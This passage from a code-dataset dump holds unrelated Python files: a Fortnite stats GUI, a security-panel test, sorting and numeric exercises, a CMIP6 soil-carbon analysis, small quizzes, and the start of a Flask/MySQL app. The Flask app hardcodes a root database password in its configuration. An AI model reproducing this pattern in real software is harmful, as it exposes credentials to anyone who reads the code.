font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=1, sticky='w')\n\n # Win Percentage Label\n self.win_per = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Win Percentage: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.win_per, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=1, sticky='w')\n\n # Kills Label\n self.kills = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Kills: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.kills, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=5, sticky='w')\n\n # Kill/Death Ratio Label\n self.kdr = tkinter.StringVar()\n tkinter.Label(stat_frame, text='KDR: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.kdr, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, 
fg=STAT_FG_COLOR).grid(row=4, column=5, sticky='w')\n\n # Score Per Match Label\n self.spm = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Avg. Score:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.spm, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=5, sticky='w')\n #######################\n # Seasonal Stats #\n #######################\n # Season Stat frame\n season_stat_frame = tkinter.Frame(self)\n season_stat_frame.pack(fill='x')\n season_stat_frame.configure(bg=STAT_BG_COLOR)\n\n # Season Title label\n tkinter.Label(season_stat_frame, text='==Seasonal Stats==', font=('Arial', 14, 'bold'), bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=1, columnspan=3, sticky='ew')\n\n # Win label\n self.season_wins = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Wins: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_wins, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=1, sticky='w')\n\n # Matches Played Label\n self.season_matches_played = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Matches Played: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_matches_played, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=1, sticky='w')\n\n # Win Percentage Label\n self.season_win_per = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Win Percentage: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_win_per, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=1, sticky='w')\n\n # Kills Label\n self.season_kills = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Kills: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_kills, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=5, sticky='w')\n\n # Kill/Death Ratio Label\n self.season_kdr = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='KDR: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_kdr, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=5, sticky='w')\n\n # Avg score per match\n self.season_spm = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Avg. 
Score:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_spm, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=5, sticky='w')\n\n # clickable link to Fortnite website\n fortnite_link = tkinter.Label(self, text='Play FORTNITE For Free!', font='Impact 10')\n fortnite_link.pack(side='right')\n fortnite_link.bind('<Button-1>', self.game_page)\n\n self.update()\n\n def solo_player_stats(self, *event):\n \"\"\"Grab lifetime/seasonal solo stats\"\"\"\n player_data = self.grab_player_profile()\n if player_data:\n # Lifetime stats\n solo_stats = player_data['stats']['p2']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(solo_stats['matches']['value'])\n self.wins.set(solo_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((solo_stats['top1']['valueInt'] / solo_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(solo_stats['kills']['value'])\n self.kdr.set(solo_stats['kd']['value'] + \"%\")\n self.spm.set(solo_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_solo_stats = player_data['stats']['curr_p2']\n self.season_matches_played.set(season_solo_stats['matches']['value'])\n self.season_wins.set(season_solo_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_solo_stats['top1']['valueInt'] / season_solo_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_solo_stats['kills']['value'])\n self.season_kdr.set(season_solo_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_solo_stats['scorePerMatch']['value'])\n\n def duo_player_stats(self):\n \"\"\"Grab lifetime/seasonal duo stats\"\"\"\n player_data = self.grab_player_profile()\n # Lifetime stats\n if player_data:\n duo_stats = player_data['stats']['p10']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(duo_stats['matches']['value'])\n self.wins.set(duo_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((duo_stats['top1']['valueInt'] / duo_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(duo_stats['kills']['value'])\n self.kdr.set(duo_stats['kd']['value'] + \"%\")\n self.spm.set(duo_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_duo_stats = player_data['stats']['curr_p10']\n self.season_matches_played.set(season_duo_stats['matches']['value'])\n self.season_wins.set(season_duo_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_duo_stats['top1']['valueInt'] / season_duo_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_duo_stats['kills']['value'])\n self.season_kdr.set(season_duo_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_duo_stats['scorePerMatch']['value'])\n\n def squad_player_stats(self):\n \"\"\"Grab lifetime/seasonal squad stats\"\"\"\n player_data = self.grab_player_profile()\n if player_data:\n # Lifetime stats\n squad_stats = player_data['stats']['p9']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(squad_stats['matches']['value'])\n self.wins.set(squad_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((squad_stats['top1']['valueInt'] / squad_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(squad_stats['kills']['value'])\n self.kdr.set(squad_stats['kd']['value'] + \"%\")\n 
self.spm.set(squad_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_squad_stats = player_data['stats']['curr_p9']\n self.season_matches_played.set(season_squad_stats['matches']['value'])\n self.season_wins.set(season_squad_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_squad_stats['top1']['valueInt'] / season_squad_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_squad_stats['kills']['value'])\n self.season_kdr.set(season_squad_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_squad_stats['scorePerMatch']['value'])\n\n def grab_player_profile(self):\n user = self.user.get()\n platform = 'pc'\n r = requests.get('https://api.fortnitetracker.com/v1/profile/{}/{}'.format(platform, user), headers=HEADERS)\n player_data = r.json()\n if len(player_data) == 1:\n messagebox.showerror(\"ERROR!\", 'Username not found.')\n return 0\n return player_data\n\n def tracker_page(self, event):\n webbrowser.open_new(r\"https://fortnitetracker.com/\")\n\n def game_page(self, event):\n webbrowser.open_new(r\"https://www.epicgames.com/fortnite/en-US/home\")\n\n\nif __name__ == '__main__':\n win = MainWindow()\n win.mainloop()\n\n\n\n","repo_name":"Ryoliveira/FortniteStatGUI","sub_path":"FortniteGUI.py","file_name":"FortniteGUI.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33950216600","text":"from pyspcwebgw import Area\nfrom pyspcwebgw.const import AreaMode\n\nAREA_DEF_1 = {\n \"id\": \"1\",\n \"name\": \"House\",\n \"mode\": \"3\",\n \"last_set_time\": \"1485759851\",\n \"last_set_user_id\": \"1\",\n \"last_set_user_name\": \"Pelle\",\n \"last_unset_time\": \"1485800564\",\n \"last_unset_user_id\": \"1\",\n \"last_unset_user_name\": \"Lisa\",\n \"last_alarm\": \"1478174896\",\n}\n\nAREA_DEF_2 = {\n \"id\": \"3\",\n \"name\": \"Garage\",\n \"mode\": \"0\",\n \"last_set_time\": \"1483705803\",\n \"last_set_user_id\": \"9998\",\n \"last_set_user_name\": \"Pelle\",\n \"last_unset_time\": \"1483705808\",\n \"last_unset_user_id\": \"9998\",\n \"last_unset_user_name\": \"Lisa\",\n}\n\n\ndef test_parse_details():\n area = Area(gateway=None, spc_area=AREA_DEF_1)\n assert area.name == \"House\"\n assert area.mode == AreaMode.FULL_SET\n\n area = Area(gateway=None, spc_area=AREA_DEF_2)\n assert area.name == \"Garage\"\n assert area.mode == AreaMode.UNSET\n\n\ndef test_last_changed_by_depends_on_mode():\n area = Area(gateway=None, spc_area=AREA_DEF_1)\n assert area.last_changed_by == \"Pelle\"\n\n area = Area(gateway=None, spc_area=AREA_DEF_2)\n assert area.last_changed_by == \"Lisa\"\n","repo_name":"pyspcwebgw/pyspcwebgw","sub_path":"tests/test_area.py","file_name":"test_area.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33140884211","text":"import numpy as np\nimport time\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom pylab import *\n\nplt.close('all')\n\ndef heapSort( aList ):\n # convert aList to heap\n length = len( aList ) - 1\n leastParent = int(length / 2)\n for i in range ( leastParent, -1, -1 ):\n moveDown( aList, i, length )\n \n # flatten heap into sorted array\n for i in range ( length, 0, -1 ):\n if aList[0] > aList[i]:\n swap( aList, 0, i )\n moveDown( aList, 0, i - 1 )\n \n \ndef moveDown( aList, first, last ):\n largest = 2 * first + 1\n while largest <= last:\n # right child exists and is larger than left 
child\n if ( largest < last ) and ( aList[largest] < aList[largest + 1] ):\n largest += 1\n \n # right child is larger than parent\n if aList[largest] > aList[first]:\n swap( aList, largest, first )\n # move down to largest child\n first = largest\n largest = 2 * first + 1\n else:\n return # force exit\n \n \ndef swap( A, x, y ):\n tmp = A[x]\n A[x] = A[y]\n A[y] = tmp\n\n# Driver code to test above \narraySize = 10\n\n#arr = np.random.randint(low=1, high=100, size= arraySize).tolist()\narr = [ 12, 11, 13, 5, 6, 7] \nheapSort(arr) \nn = len(arr) \nprint (\"Sorted array is\", arr) \n\n\n#for i in range(n): \n#\tprint (\"%d\" %arr[i]), \n","repo_name":"MariamChowdhury/Python-Codes","sub_path":"heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18715756678","text":"import face_alignment\nimport matplotlib.pyplot as plt\nfrom skimage import io\nimport numpy as np\nimport argparse\n\n\ndef run(img_path, txt_path, vis):\n fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cpu', face_detector='sfd')\n image = io.imread(img_path)\n det = fa.get_landmarks_from_image(image)\n\n np.savetxt(txt_path, det[0], fmt='%.4f')\n\n if vis:\n plt.imshow(image)\n for detection in det:\n plt.scatter(detection[:,0], detection[:,1], 2)\n print('Landmarks saved in ' + txt_path)\n\nif __name__ == \"__main__\":\n # Training settings\n parser = argparse.ArgumentParser(description='2D Landmarks Detection')\n parser.add_argument('--image_path', type=str, help='Path to image')\n parser.add_argument('--txt_path', type=str, help='Path to saved txt')\n parser.add_argument('--vis', action='store_true', help='Visualize landmarks on image')\n args = parser.parse_args()\n\n run(args.image_path, args.txt_path, args.vis)","repo_name":"anantarb/FRDI","sub_path":"detect_landmarks.py","file_name":"detect_landmarks.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39663335348","text":"from django.conf.urls import url, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom .views import ActivityDownloadcsv,ActivityDateView,SortedActivity,SortedMasterPlan\n\nurlpatterns = [\n url(r'^activity/', ActivityDownloadcsv.as_view()),\n url(r'^activitydates/(?P<date>.*)$', ActivityDateView.as_view()),\n url(r'^sortedactivity/', SortedActivity.as_view()),\n url(r'^sortedmasterplan/', SortedMasterPlan.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"KrishnaSindhur/construction-app","sub_path":"src/construction_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17509697704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on May 2022\n@author: Rebecca Varney, University of Exeter (r.varney@exeter.ac.uk)\n\n\"\nScript quantifies and saves dCs and the breakdown values (dCs,npp / dCs,tau / dnppdtau, dCs,nep / dCs,tau_nep / dnepdtau)\nfor the C4MIP simulations for 2xCO2 and 4xCO2.\n\"\n\n\"\"\"\n\n#%%\n\n# Analysis imports\nimport numpy as np\nimport iris\nimport iris.coord_categorisation\nimport glob\nimport warnings\nfrom iris.experimental.equalise_cubes import equalise_attributes\n\n# My functions\nfrom rmv_cmip_analysis import combine_netCDF_cmip6, combine_netCDF_model, 
open_netCDF\nfrom rmv_cmip_analysis import annual_average, global_total_percentage\n\n\n#%%\n\n# C4MIP simulations\nC4MIP_simulation = ['1pctCO2', '1pctCO2-bgc', '1pctCO2-rad']\nC4MIP_labels = ['1pctCO2', '1pctCO2_bgc', '1pctCO2_rad']\n\n# CMIP6 models\ncmip6_models = ['ACCESS-ESM1-5', 'BCC-CSM2-MR', 'CanESM5', 'CESM2', 'GFDL-ESM4', 'IPSL-CM6A-LR', 'MIROC-ES2L', 'MPI-ESM1-2-LR', 'NorESM2-LM', 'UKESM1-0-LL']\nmodel_colors = ['peachpuff', '#fb8072', '#80b1d3', 'dodgerblue', 'darkcyan', 'darkgreen', 'olive', 'gold', 'orange', 'darkseagreen']\nn_models = len(cmip6_models)\n\n# 2xCO2 (65:70)\n# 4xCO2 (135:140)\n\n\n# Loop through each C4MIP simulation\nfor c4mip_option in range(0, len(C4MIP_simulation)):\n #\n c4mip = C4MIP_simulation[c4mip_option]\n C4MIP_label = C4MIP_labels[c4mip_option]\n \n \n # Empty arrays\n cmip6_deltaCs = np.zeros((len(cmip6_models)))\n cmip6_deltaCstau = np.zeros((len(cmip6_models)))\n cmip6_deltaCsNPP = np.zeros((len(cmip6_models)))\n cmip6_deltadelta = np.zeros((len(cmip6_models)))\n cmip6_NEPtau = np.zeros((len(cmip6_models)))\n cmip6_deltaNEPdeltatau = np.zeros((len(cmip6_models)))\n cmip6_NEPdeltatau = np.zeros((len(cmip6_models)))\n #\n# cmip6_deltaCs_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaCstau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaCsNPP_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltadelta_fractional = np.zeros((len(cmip6_models)))\n# cmip6_NEPtau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaNEPdeltatau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_NEPdeltatau_fractional = np.zeros((len(cmip6_models)))\n\n\n # for loop for each CMIP6 model\n for model_i in range(0, n_models):\n model = cmip6_models[model_i]\n print(model, c4mip)\n \n # land fraction\n landfraction = combine_netCDF_model('/home/rmv203/DATA/cmip6_data/sftlf_fx_'+model+'_historical*', model)\n \n # Soil Carbon (cSoil)\n cSoil_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/cSoil_Emon_'+model+'_'+c4mip+'*', model)\n cSoil_cube = open_netCDF(cSoil_cube)\n cSoil_cube = annual_average(cSoil_cube)\n cSoil_cube = global_total_percentage(cSoil_cube, landfrac=landfraction, latlon_cons=None)\n cSoil_data = cSoil_cube.data\n \n # time dimension\n if model == 'ACCESS-ESM1-5':\n time_dimension = cSoil_cube.coord('year').points\n \n # Litter Carbon (cLitter)\n if model=='ACCESS-ESM1-5' or model=='BCC-CSM2-MR' or model=='CanESM5' or model=='CESM2' or model=='CNRM-ESM2-1' or model=='IPSL-CM6A-LR' or model=='MIROC-ES2L' or model=='MPI-ESM1-2-LR' or model=='NorESM2-LM' or model=='GFDL-ESM4':\n cLitter_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/cLitter_Lmon_'+model+'_'+c4mip+'*', model)\n cLitter_cube = open_netCDF(cLitter_cube)\n cLitter_cube = annual_average(cLitter_cube)\n cLitter_cube = global_total_percentage(cLitter_cube, landfrac=landfraction, latlon_cons=None)\n cLitter_data = cLitter_cube.data\n #\n Cs_data = cSoil_data + cLitter_data\n else:\n Cs_data = cSoil_data.copy()\n \n # NPP\n npp_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/npp_Lmon_'+model+'_'+c4mip+'*', model)\n npp_cube = open_netCDF(npp_cube)\n npp_cube = annual_average(npp_cube)\n npp_cube = global_total_percentage(npp_cube, landfrac=landfraction, latlon_cons=None)\n npp_data = npp_cube.data*86400.*360. 
\n \n # tau \n rh_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/rh_Lmon_'+model+'_'+c4mip+'*', model)\n rh_cube = open_netCDF(rh_cube)\n rh_cube = annual_average(rh_cube)\n rh_cube = global_total_percentage(rh_cube, landfrac=landfraction, latlon_cons=None)\n rh_data = rh_cube.data*86400.*360.\n #\n tau_data = Cs_data/rh_data\n\n # dCs\n deltaCs = np.mean(Cs_data[65:70]) - Cs_data[0] \n \n # dCs,tau\n delta_tau = np.mean(tau_data[65:70]) - tau_data[0]\n deltaCs_tau = delta_tau*npp_data[0]\n \n # dCs,npp\n delta_npp = np.mean(npp_data[65:70]) - npp_data[0]\n deltaCs_npp = delta_npp*tau_data[0]\n \n # dnpp*dtau\n deltadelta = delta_npp*delta_tau\n \n # dNEP\n NEP_t = np.mean(npp_data[65:70]) - np.mean(rh_data[65:70])\n NEP_0 = npp_data[0] - rh_data[0]\n # dCs,NEP\n deltaCs_NEPtau = (NEP_t - NEP_0)*tau_data[0]\n # dCs,tau_NEP\n deltaCs_NEPdeltatau = NEP_0*delta_tau\n # dNEP*dtau\n deltaNEPdeltatau = (NEP_t - NEP_0)*delta_tau\n \n \n #%% Input to arrays\n cmip6_deltaCs[model_i] = deltaCs\n cmip6_deltaCstau[model_i] = deltaCs_tau\n cmip6_deltaCsNPP[model_i] = deltaCs_npp\n cmip6_deltadelta[model_i] = deltadelta\n cmip6_NEPtau[model_i] = deltaCs_NEPtau\n cmip6_NEPdeltatau[model_i] = deltaCs_NEPdeltatau\n cmip6_deltaNEPdeltatau[model_i] = deltaNEPdeltatau\n \n# cmip6_deltaCs_fractional[model_i] = deltaCs / Cs_data[0]\n# cmip6_deltaCstau_fractional[model_i] = deltaCs_tau / Cs_data[0]\n# cmip6_deltaCsNPP_fractional[model_i] = deltaCs_npp / Cs_data[0]\n# cmip6_deltadelta_fractional[model_i] = deltadelta / Cs_data[0]\n# cmip6_NEPtau_fractional[model_i] = deltaCs_NEPtau / Cs_data[0]\n# cmip6_NEPdeltatau_fractional[model_i] = deltaCs_NEPdeltatau / Cs_data[0]\n# cmip6_deltaNEPdeltatau_fractional[model_i] = deltaNEPdeltatau / Cs_data[0]\n\n\n #%% Saving data\n \n np.save('saved_data/cmip6_Cs_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCs.data)\n np.save('saved_data/cmip6_Cstau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCstau.data)\n np.save('saved_data/cmip6_CsNPP_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCsNPP.data)\n np.save('saved_data/cmip6_deltadelta_'+C4MIP_label+'_2xCO2.npy', cmip6_deltadelta.data)\n np.save('saved_data/cmip6_NEPtau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPtau.data)\n np.save('saved_data/cmip6_deltaNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaNEPdeltatau.data)\n np.save('saved_data/cmip6_NEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPdeltatau.data)\n\n# np.save('saved_data/cmip6_fractionalCs_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCs_fractional.data)\n# np.save('saved_data/cmip6_fractionalCstau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCstau_fractional.data)\n# np.save('saved_data/cmip6_fractionalCsNPP_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCsNPP_fractional.data)\n# np.save('saved_data/cmip6_fractionaldeltadelta_'+C4MIP_label+'_2xCO2.npy', cmip6_deltadelta_fractional.data)\n# np.save('saved_data/cmip6_fractionalNEPtau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPtau_fractional.data)\n# np.save('saved_data/cmip6_fractionaldeltaNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaNEPdeltatau_fractional.data)\n# np.save('saved_data/cmip6_fractionalNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPdeltatau_fractional.data)\n \n ","repo_name":"rebeccamayvarney/CMIP6_dCs","sub_path":"quantify_dCs_C4MIP.py","file_name":"quantify_dCs_C4MIP.py","file_ext":"py","file_size_in_byte":8059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26110340719","text":"from pydantic_settings import BaseSettings\n\n\nclass Settings(BaseSettings):\n 
\"\"\"Настройки телеграмм-бота\"\"\"\n TOKEN: str\n TELEGRAM_LINK: str = \"https://t.me/so1ez\"\n VK_LINK: str = \"https://vk.com/so1ez\"\n GITHUB_LINK: str = \"https://github.com/so1ez\"\n IN_TAGRAM_LINK: str = \"https://instagram.com/lso1ezl\"\n HELLO_MSG: str = \"Привет👋! Я Владимир, мой никнейм в соцсетях - Сóлез (so1ez). \" + \\\n \"Этот бот нужен только для одной цели - предоставить ссылки на мои соцсети!🔗\"\n\n class Config:\n env_file = '.env'\n\n\nSETTINGS = Settings()","repo_name":"so1ez/links-telegram-bot","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3516998280","text":"import pyinputplus as pyip\nimport random\nimport time\n\nnumero_preguntas = 10\nrespuestas_correctas = 0\nfor pregunta in range(numero_preguntas):\n # Elegir dos números aleatorios entre 1 y 10:\n numero1 = random.randint(1, 10)\n numero2 = random.randint(1, 10)\n # Preguntar al usuario:\n pregunta = f\"{numero1} x {numero2} = \"\n try:\n respuesta = pyip.inputStr(pregunta, \n allowRegexes=[f'^{numero1 * numero2}$'], \n blockRegexes=[(\".*\", \"Respuesta inválida\")],\n timeout=8, limit=3)\n except pyip.TimeoutException:\n print(\"¡Tiempo agotado!\")\n break\n except pyip.RetryLimitException:\n print(\"¡Demasiados intentos fallidos!\")\n break\n else:\n print(\"¡Correcto!\")\n respuestas_correctas += 1\n\ntime.sleep(1)\nprint(f\"¡Has acertado {respuestas_correctas} de {numero_preguntas} preguntas!\")\nprint(\"¡Hasta pronto!\")","repo_name":"agustincomolli/Python","sub_path":"Automatiza cosas aburridas/35-prueba_multiplicar.py","file_name":"35-prueba_multiplicar.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8453952652","text":"# Sheldon D'Souza\n# I started out by researching Newtons method for finding roots\n# I coded in the equation for Newton's method which uses the formula:\n# x1 = x0 - f(x0) / f'(x0)\n# I then used a for loop for the iterations to get closer to desired answer\n\n\ndef sqrt():\n\t\n\t# asked for user input as per instructions. We can also ask for an argument \n\t# to be specified while defining the function\n\t# added a while loop to validate whether to validate whether the number is positive.\n\t# If the number is neagtive the program will display a message and repeat the loop asking for the number again.\n\n\tis_positive = True\n\twhile is_positive:\n\t\tpositive_number = float(input('Please enter a positive number: '))\n\t\tif positive_number < 1: # I chose 1 here as I also wanted to exclude 0 from the user input as it will give a 'div by zero' error\n\t\t\t print('The number you have entered is not a positive number')\n\t\telse:\n\t\t\tis_positive = False\t \n\n\t\n\t# The following code will be the first guess for the number. 
\n\t# This part was a bit tricky but after some research I was able to settle on half the initial number as a good first guess\n\t\n\tpositive_number_guess = (positive_number) / 2\n\t\n\t# The for loop will use the guess as a start and get closer to the answer after each iteration \n\t# (This is part of Newton's method which is meant to get closer to the approximate root after each iteration)\n\t# I start by iterating through the list using a while loop\n\t# Based on feedback I added code to break the loop if a precision of 4 decimal places is reached\n\t# \tIt was tricky but I did this by adding the result of each iteration to a list and then comparing the last two values\n\t#\t\tof the list (rounded to 4 decimal places) until they were equal, at which point the loop breaks\n\n\tl = [] # defined empty list as per documentation above\n\twhile True: # Decided to use a while loop instead of #\tfor n in range (1,100):\n\t\treal_f = (positive_number_guess ** 2) - positive_number\n\t\tderivative_f = 2 * positive_number_guess\n\t\tpositive_number_guess = positive_number_guess - (real_f / derivative_f)\n\t\tl.append(positive_number_guess) # appends the result of the iteration to a list for use\n\t\tif len(l) > 1: # if statement to avoid a null list error\n\t\t\tif round(l[-1], 4) == round(l[-2], 4): # compares last two values of list (rounded to 4 decimals) for equality\n#\t\t\t\tprint(l) # I have commented out this line, which proves the precision limit on the iteration is working\n\t\t\t\tbreak # breaks out of the loop once the precision level has been reached\n\n\t# printed the desired output\n\t\n\tprint('The square root of', positive_number, 'is approximately', round(positive_number_guess, 4))\n\nsqrt() # calls the function","repo_name":"dssheldon/pands-programs-sds","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10191482931","text":"verbo = input(\"Digite o ver a ser conjulgado: \")\ntamanho_do_verbo = len(verbo)\nradical = verbo[: tamanho_do_verbo - 2]\n\npessoa = [\"Eu\", \"Tu\", \"Ele\", \"Nós\", \"Vós\", \"Eles\"]\ntermina_a = [\"o\", \"as\", \"a\", \"amos\", \"ais\", \"am\"]\ntermina_e = [\"o\", \"es\", \"e\", \"emos\", \"eis\", \"em\"]\ntermina_resto = [\"o\", \"es\", \"e\", \"imos\", \"is\", \"em\"]\n\nterminacao = verbo[tamanho_do_verbo - 2]\n\nif terminacao == \"a\":\n    for i in range(6):\n        print(f\"{pessoa[i]} {radical}{termina_a[i]}\")\nelif terminacao == \"e\":\n    for i in range(6):\n        print(f\"{pessoa[i]} {radical}{termina_e[i]}\")\nelse:\n    for i in range(6):\n        print(f\"{pessoa[i]} {radical}{termina_resto[i]}\")\n","repo_name":"Jacksoan-Eufrosino/IntroProg","sub_path":"beecrowd/strings4.py","file_name":"strings4.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"la","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32933087089","text":"# imports\nfrom flask import Flask, render_template, request, redirect\nfrom flaskext.mysql import MySQL\n\n# web application\napp = Flask(__name__)\n\n# connect to db\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = 'e4l7l9i7!'\napp.config['MYSQL_DATABASE_DB'] = 'book_industry'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\nmysql.init_app(app)\n\n@app.route('/')\ndef index():\n    return render_template('/index.html')\n\n@app.route('/add', methods=['POST'])\ndef add():\n    # Fetch form data\n    
